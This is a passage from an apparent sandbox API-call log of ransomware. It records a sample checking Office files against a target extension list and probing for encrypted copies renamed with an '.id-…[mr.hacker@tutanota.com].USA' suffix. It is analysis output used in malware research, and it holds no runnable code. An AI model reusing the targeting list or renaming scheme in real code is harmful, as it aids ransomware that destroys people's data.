Shared\\ink\\journal.dll") returned 62 [0264.594] lstrlenW (lpString=".doc") returned 4 [0264.596] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0264.598] lstrlenW (lpString=".docx") returned 5 [0264.601] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1 [0264.603] lstrlenW (lpString=".pdf") returned 4 [0264.606] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0264.609] lstrlenW (lpString=".xls") returned 4 [0264.609] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0264.609] lstrlenW (lpString=".xlsx") returned 5 [0264.609] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1 [0264.609] lstrlenW (lpString=".ppt") returned 4 [0264.609] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0264.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned 62 [0264.609] lstrlenW (lpString=".zip") returned 4 [0264.610] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0264.610] lstrlenW (lpString=".rar") returned 4 [0264.610] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0264.610] lstrlenW (lpString=".bz2") returned 4 [0264.610] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0264.610] lstrlenW (lpString=".7z") returned 3 [0264.610] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0264.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned 62 [0264.610] lstrlenW (lpString=".dbf") returned 4 [0264.610] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0264.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned 62 [0264.610] lstrlenW (lpString=".1cd") returned 4 [0264.610] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0264.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned 62 [0264.610] lstrlenW (lpString=".jpg") returned 4 [0264.610] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0264.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned 62 [0264.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned 62 [0264.610] lstrlenW (lpString=".doc") returned 4 [0264.610] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0264.610] lstrlenW (lpString=".docx") returned 5 [0264.610] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1 [0264.610] lstrlenW (lpString=".pdf") returned 4 [0264.610] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0264.610] lstrlenW (lpString=".xls") returned 4 [0264.610] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0264.610] lstrlenW (lpString=".xlsx") returned 5 [0264.610] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1 [0264.610] lstrlenW (lpString=".ppt") returned 4 [0264.611] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0264.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned 62 [0264.611] lstrlenW (lpString=".zip") returned 4 [0264.611] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0264.611] lstrlenW (lpString=".rar") returned 4 [0264.611] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0264.611] lstrlenW (lpString=".bz2") returned 4 [0264.611] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0264.611] lstrlenW (lpString=".7z") returned 3 [0264.611] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0264.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned 62 [0264.611] lstrlenW (lpString=".dbf") returned 4 [0264.611] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0264.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned 62 [0264.611] lstrlenW (lpString=".1cd") returned 4 [0264.611] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0264.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned 62 [0264.611] lstrlenW (lpString=".jpg") returned 4 [0264.611] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0264.611] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0264.611] lstrlenW (lpString="PJRESC.DLL") returned 10 [0264.611] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pjresc.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0264.909] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=261008) returned 1 [0264.909] CloseHandle (hObject=0x37c) returned 1 [0264.909] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pjresc.dll")) returned 0x20 [0264.909] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pjresc.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.909] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pjresc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 66 [0264.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 66 [0264.909] lstrlenW (lpString=".doc") returned 4 [0264.909] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0264.909] lstrlenW (lpString=".docx") returned 5 [0264.909] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1 [0264.909] lstrlenW (lpString=".pdf") returned 4 [0264.909] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0264.909] lstrlenW (lpString=".xls") returned 4 [0264.909] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0264.909] lstrlenW (lpString=".xlsx") returned 5 [0264.909] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1 [0264.909] lstrlenW (lpString=".ppt") returned 4 [0264.909] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0264.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 66 [0264.909] lstrlenW (lpString=".zip") returned 4 [0264.910] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0264.910] lstrlenW (lpString=".rar") returned 4 [0264.910] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0264.910] lstrlenW (lpString=".bz2") returned 4 [0264.910] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0264.910] lstrlenW (lpString=".7z") returned 3 [0264.910] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0264.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 66 [0264.910] lstrlenW (lpString=".dbf") returned 4 [0264.910] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0264.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 66 [0264.910] lstrlenW (lpString=".1cd") returned 4 [0264.910] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0264.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 66 [0264.910] lstrlenW (lpString=".jpg") returned 4 [0264.910] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0264.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 66 [0264.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 66 [0264.910] lstrlenW (lpString=".doc") returned 4 [0264.910] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0264.910] lstrlenW (lpString=".docx") returned 5 [0264.910] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1 [0264.910] lstrlenW (lpString=".pdf") returned 4 [0264.910] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0264.910] lstrlenW (lpString=".xls") returned 4 [0264.910] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0264.910] lstrlenW (lpString=".xlsx") returned 5 [0264.910] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1 [0264.910] lstrlenW (lpString=".ppt") returned 4 [0264.911] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0264.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 66 [0264.911] lstrlenW (lpString=".zip") returned 4 [0264.911] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0264.911] lstrlenW (lpString=".rar") returned 4 [0264.911] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0264.911] lstrlenW (lpString=".bz2") returned 4 [0264.911] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0264.911] lstrlenW (lpString=".7z") returned 3 [0264.911] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0264.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 66 [0264.911] lstrlenW (lpString=".dbf") returned 4 [0264.911] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0264.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 66 [0264.911] lstrlenW (lpString=".1cd") returned 4 [0264.911] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0264.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 66 [0264.911] lstrlenW (lpString=".jpg") returned 4 [0264.911] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0264.911] lstrcmpiW (lpString1=".INF", lpString2=".USA") returned -1 [0264.911] lstrlenW (lpString="BOLDSTRI.INF") returned 12 [0264.911] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0264.969] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=596) returned 1 [0264.969] CloseHandle (hObject=0x380) returned 1 [0264.969] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.inf")) returned 0x20 [0264.969] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.inf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.969] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 77 [0264.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 77 [0264.969] lstrlenW (lpString=".doc") returned 4 [0264.969] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0264.969] lstrlenW (lpString=".docx") returned 5 [0264.969] lstrcmpiW (lpString1=".docx", lpString2="I.INF") returned -1 [0264.969] lstrlenW (lpString=".pdf") returned 4 [0264.969] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0264.969] lstrlenW (lpString=".xls") returned 4 [0264.969] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0264.969] lstrlenW (lpString=".xlsx") returned 5 [0264.969] lstrcmpiW (lpString1=".xlsx", lpString2="I.INF") returned -1 [0264.969] lstrlenW (lpString=".ppt") returned 4 [0264.970] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0264.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 77 [0264.970] lstrlenW (lpString=".zip") returned 4 [0264.970] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0264.970] lstrlenW (lpString=".rar") returned 4 [0264.970] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0264.970] lstrlenW (lpString=".bz2") returned 4 [0264.970] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0264.970] lstrlenW (lpString=".7z") returned 3 [0264.970] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0264.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 77 [0264.970] lstrlenW (lpString=".dbf") returned 4 [0264.970] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0264.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 77 [0264.970] lstrlenW (lpString=".1cd") returned 4 [0264.970] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0264.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 77 [0264.970] lstrlenW (lpString=".jpg") returned 4 [0264.970] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0264.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 77 [0264.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 77 [0264.970] lstrlenW (lpString=".doc") returned 4 [0264.970] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0264.970] lstrlenW (lpString=".docx") returned 5 [0264.970] lstrcmpiW (lpString1=".docx", lpString2="I.INF") returned -1 [0264.970] lstrlenW (lpString=".pdf") returned 4 [0264.970] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0264.970] lstrlenW (lpString=".xls") returned 4 [0264.970] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0264.971] lstrlenW (lpString=".xlsx") returned 5 [0264.971] lstrcmpiW (lpString1=".xlsx", lpString2="I.INF") returned -1 [0264.971] lstrlenW (lpString=".ppt") returned 4 [0264.971] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0264.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 77 [0264.971] lstrlenW (lpString=".zip") returned 4 [0264.971] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0264.971] lstrlenW (lpString=".rar") returned 4 [0264.971] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0264.971] lstrlenW (lpString=".bz2") returned 4 [0264.971] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0264.971] lstrlenW (lpString=".7z") returned 3 [0264.971] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0264.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 77 [0264.971] lstrlenW (lpString=".dbf") returned 4 [0264.971] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0264.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 77 [0264.971] lstrlenW (lpString=".1cd") returned 4 [0264.971] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0264.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 77 [0264.971] lstrlenW (lpString=".jpg") returned 4 [0264.971] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0264.971] lstrcmpiW (lpString1=".ELM", lpString2=".USA") returned -1 [0264.971] lstrlenW (lpString="CANYON.ELM") returned 10 [0264.971] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.elm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0264.972] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=44745) returned 1 [0264.972] CloseHandle (hObject=0x380) returned 1 [0264.972] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.elm")) returned 0x20 [0264.972] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.elm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.973] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 73 [0264.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 73 [0264.973] lstrlenW (lpString=".doc") returned 4 [0264.973] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0264.973] lstrlenW (lpString=".docx") returned 5 [0264.973] lstrcmpiW (lpString1=".docx", lpString2="N.ELM") returned -1 [0264.973] lstrlenW (lpString=".pdf") returned 4 [0264.973] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0264.973] lstrlenW (lpString=".xls") returned 4 [0264.973] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0264.973] lstrlenW (lpString=".xlsx") returned 5 [0264.973] lstrcmpiW (lpString1=".xlsx", lpString2="N.ELM") returned -1 [0264.973] lstrlenW (lpString=".ppt") returned 4 [0264.973] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0264.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 73 [0264.973] lstrlenW (lpString=".zip") returned 4 [0264.973] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0264.973] lstrlenW (lpString=".rar") returned 4 [0264.973] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0264.973] lstrlenW (lpString=".bz2") returned 4 [0264.974] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0264.974] lstrlenW (lpString=".7z") returned 3 [0264.974] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0264.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 73 [0264.974] lstrlenW (lpString=".dbf") returned 4 [0264.974] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0264.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 73 [0264.974] lstrlenW (lpString=".1cd") returned 4 [0264.974] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0264.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 73 [0264.974] lstrlenW (lpString=".jpg") returned 4 [0264.974] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0264.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 73 [0264.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 73 [0264.974] lstrlenW (lpString=".doc") returned 4 [0264.974] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0264.974] lstrlenW (lpString=".docx") returned 5 [0264.974] lstrcmpiW (lpString1=".docx", lpString2="N.ELM") returned -1 [0264.974] lstrlenW (lpString=".pdf") returned 4 [0264.974] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0264.974] lstrlenW (lpString=".xls") returned 4 [0264.974] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0264.974] lstrlenW (lpString=".xlsx") returned 5 [0264.974] lstrcmpiW (lpString1=".xlsx", lpString2="N.ELM") returned -1 [0264.974] lstrlenW (lpString=".ppt") returned 4 [0264.974] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0264.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 73 [0264.974] lstrlenW (lpString=".zip") returned 4 [0264.975] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0264.975] lstrlenW (lpString=".rar") returned 4 [0264.975] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0264.975] lstrlenW (lpString=".bz2") returned 4 [0264.975] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0264.975] lstrlenW (lpString=".7z") returned 3 [0264.975] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0264.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 73 [0264.975] lstrlenW (lpString=".dbf") returned 4 [0264.975] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0264.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 73 [0264.975] lstrlenW (lpString=".1cd") returned 4 [0264.975] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0264.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 73 [0264.975] lstrlenW (lpString=".jpg") returned 4 [0264.975] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0264.975] lstrcmpiW (lpString1=".INF", lpString2=".USA") returned -1 [0264.975] lstrlenW (lpString="CANYON.INF") returned 10 [0264.975] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0264.976] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=465) returned 1 [0264.976] CloseHandle (hObject=0x380) returned 1 [0264.976] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.inf")) returned 0x20 [0264.976] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.inf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.976] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 73 [0264.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 73 [0264.976] lstrlenW (lpString=".doc") returned 4 [0264.976] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0264.976] lstrlenW (lpString=".docx") returned 5 [0264.977] lstrcmpiW (lpString1=".docx", lpString2="N.INF") returned -1 [0264.977] lstrlenW (lpString=".pdf") returned 4 [0264.977] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0264.977] lstrlenW (lpString=".xls") returned 4 [0264.977] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0264.977] lstrlenW (lpString=".xlsx") returned 5 [0264.977] lstrcmpiW (lpString1=".xlsx", lpString2="N.INF") returned -1 [0264.977] lstrlenW (lpString=".ppt") returned 4 [0264.977] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0264.977] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 73 [0264.977] lstrlenW (lpString=".zip") returned 4 [0264.977] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0264.977] lstrlenW (lpString=".rar") returned 4 [0264.977] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0264.977] lstrlenW (lpString=".bz2") returned 4 [0264.977] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0264.977] lstrlenW (lpString=".7z") returned 3 [0264.977] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0264.977] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 73 [0264.977] lstrlenW (lpString=".dbf") returned 4 [0264.977] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0264.977] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 73 [0264.977] lstrlenW (lpString=".1cd") returned 4 [0264.977] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0264.977] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 73 [0264.977] lstrlenW (lpString=".jpg") returned 4 [0264.978] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0264.978] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 73 [0264.978] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 73 [0264.978] lstrlenW (lpString=".doc") returned 4 [0264.978] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0264.978] lstrlenW (lpString=".docx") returned 5 [0264.978] lstrcmpiW 